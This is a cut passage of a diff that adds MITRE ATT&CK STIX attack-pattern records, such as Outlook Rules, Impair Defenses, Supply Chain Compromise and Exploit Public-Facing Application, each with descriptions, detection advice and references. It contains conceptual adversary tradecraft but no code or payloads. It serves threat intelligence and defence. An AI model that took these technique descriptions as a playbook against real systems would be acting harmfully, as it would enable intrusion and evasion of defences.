[certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host Intrusion Prevention Systems", + "Signature-based Detection", + "Network Intrusion Detection System" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1140", + "external_id": "T1140" + }, + { + "source_name": "Volexity PowerDuke November 2016", + "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", + "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + }, + { + "source_name": "Malwarebytes Targeted Attack against Saudi Arabia", + "description": "Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.", + "url": "https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/" + }, + { + "source_name": "Carbon Black Obfuscation Sept 2016", + "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.", + "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Outlook Rules", + "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOnce malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Microsoft Security" + ], + "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", + "created": "2019-11-07T20:00:25.560Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1137/005", + "external_id": "T1137.005" + }, + { + "source_name": "SilentBreak Outlook Rules", + "description": "Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved February 4, 2019.", + "url": "https://silentbreaksecurity.com/malicious-outlook-rules/" + }, + { + "source_name": "Microsoft Detect Outlook Forms", + "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", + "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack" + }, + { + "source_name": "Pfammatter - Hidden Inbox Rules", + "description": "Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.", + "url": "https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/" + }, + { + "source_name": "SensePost NotRuler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/notruler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-20T16:43:53.391Z", + "name": "Impair Defenses", + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.\n\nMonitor environment variables and APIs that can be leveraged to disable security measures.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "IaaS", + "Linux", + "macOS", + "Containers", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Signature-based detection", + "Host intrusion prevention systems", + "File monitoring", + "Digital Certificate Validation", + "Host forensic analysis", + "Log analysis", + "Firewall" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "created": "2020-02-21T20:22:13.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562", + "external_id": "T1562" + }, + { + "source_name": "Emotet shutdown", + "description": "The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.", + "url": "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-21T14:21:57.991Z", + "name": "Cloud Accounts", + "description": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nA variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Francesco Bigarella" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a", + "created": "2022-05-27T14:30:01.904Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1586/003", + "external_id": "T1586.003" + }, + { + "source_name": "Awake Security C2 Cloud", + "description": "Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.", + "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + }, + { + "source_name": "MSTIC Nobelium Oct 2021", + "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.", + "url": "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-11T01:07:48.218Z", + "name": "Email Accounts", + "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Tristan Bennett, Seamless Intelligence", + "Bryan Onel" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", + "created": "2020-10-01T01:20:53.104Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1586/002", + "external_id": "T1586.002" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "source_name": "Microsoft DEV-0537", + "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-05T16:34:58.587Z", + "name": "Automated Collection", + "description": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Script: Script Execution", + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0802", + "external_id": "T0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-11T23:22:49.534Z", + "name": "Upload Malware", + "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Kobi Haimovich, CardinalOps", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e", + "created": "2021-03-17T20:09:13.222Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1608/001", + "external_id": "T1608.001" + }, + { + "source_name": "Volexity Ocean Lotus November 2020", + "description": "Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.", + "url": "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/" + }, + { + "source_name": "Talos IPFS 2022", + "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.", + "url": "https://blog.talosintelligence.com/ipfs-abuse/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-26T14:23:37.009Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Veeral Patel" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1195", + "external_id": "T1195" + }, + { + "source_name": "Avast CCleaner3 2018", + "description": "Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.", + "url": "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities" + }, + { + "source_name": "Command Five SK 2011", + "description": "Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.", + "url": "https://www.commandfive.com/papers/C5_APT_SKHack.pdf" + }, + { + "source_name": "IBM Storwize", + "description": "IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.", + "url": "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E" + }, + { + "source_name": "Symantec Elderwood Sept 2012", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf" + }, + { + "source_name": "Schneider Electric USB Malware", + "description": "Schneider Electric. (2018, August 24). Security Notification – USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019.", + "url": "https://www.se.com/ww/en/download/document/SESN-2018-236-01/" + }, + { + "source_name": "Trendmicro NPM Compromise", + "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.", + "url": "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets" + }, + { + "source_name": "Microsoft Dofoil 2018", + "description": "Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.", + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:04.376Z", + "name": "Block Reporting Message", + "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Operational Databases: Process/Event Alarm", + "Process: Process Termination", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0804", + "external_id": "T0804" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-11-28T21:27:35.373Z", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Yossi Weizman, Azure Defender Research Team", + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Network", + "Linux", + "macOS", + "Containers" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1190", + "external_id": "T1190" + }, + { + "source_name": "CWE top 25", + "description": "Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.", + "url": "https://cwe.mitre.org/top25/index.html" + }, + { + "source_name": "CIS Multiple SMB Vulnerabilities", + "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.", + "url": "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/" + }, + { + "source_name": "Wired Russia Cyberwar", + "description": "Greenberg, A. (2022, November 10). Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.", + "url": "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/" + }, + { + "source_name": "Mandiant Fortinet Zero Day", + "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.", + "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem" + }, + { + "source_name": "NVD CVE-2016-6662", + "description": "National Vulnerability Database. (2017, February 2). 